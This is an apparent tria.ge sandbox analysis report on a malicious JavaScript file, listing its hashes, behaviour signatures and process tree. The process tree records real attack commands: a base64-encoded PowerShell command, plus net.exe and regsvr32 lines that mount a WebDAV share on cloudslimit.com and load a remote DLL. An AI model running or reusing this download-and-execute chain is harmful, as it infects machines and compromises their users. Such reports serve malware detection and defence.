Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
21s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25/07/2024, 18:08
Static task
static1
Behavioral task
behavioral1
Sample
14346136251213330116.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
14346136251213330116.js
Resource
win10v2004-20240709-en
General
-
Target
14346136251213330116.js
-
Size
19KB
-
MD5
02f07ca2656e7ddbdae19db39b607a1a
-
SHA1
e8fa3627b573e79e4485984f377b0e9b7173524d
-
SHA256
2cfb470c0252f40847a7603acf9d3a1172149686282c3d47c36b1fafb000d801
-
SHA512
ff207165a4bed030a14620a78c9b486e7c2f27764f2e1d48643058c41f62bb497826d12fe8881e9a01b38605f7ccb7563639d8e5fcc44850444e81b5f0c0f5cb
-
SSDEEP
384:hPt6ntB3FIWe+0RyX9OFpZcSPb4JZSDyGM:7EtteYB
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 688 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1756 wrote to memory of 688 1756 wscript.exe 30 PID 1756 wrote to memory of 688 1756 wscript.exe 30 PID 1756 wrote to memory of 688 1756 wscript.exe 30 PID 688 wrote to memory of 2896 688 powershell.exe 32 PID 688 wrote to memory of 2896 688 powershell.exe 32 PID 688 wrote to memory of 2896 688 powershell.exe 32 PID 688 wrote to memory of 2916 688 powershell.exe 33 PID 688 wrote to memory of 2916 688 powershell.exe 33 PID 688 wrote to memory of 2916 688 powershell.exe 33 PID 688 wrote to memory of 2916 688 powershell.exe 33 PID 688 wrote to memory of 2916 688 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\14346136251213330116.js1⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADYAOAAyADQAMgAyADkANQAzADIANQA1ADQALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2896
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\26824229532554.dll3⤵PID:2916
-
-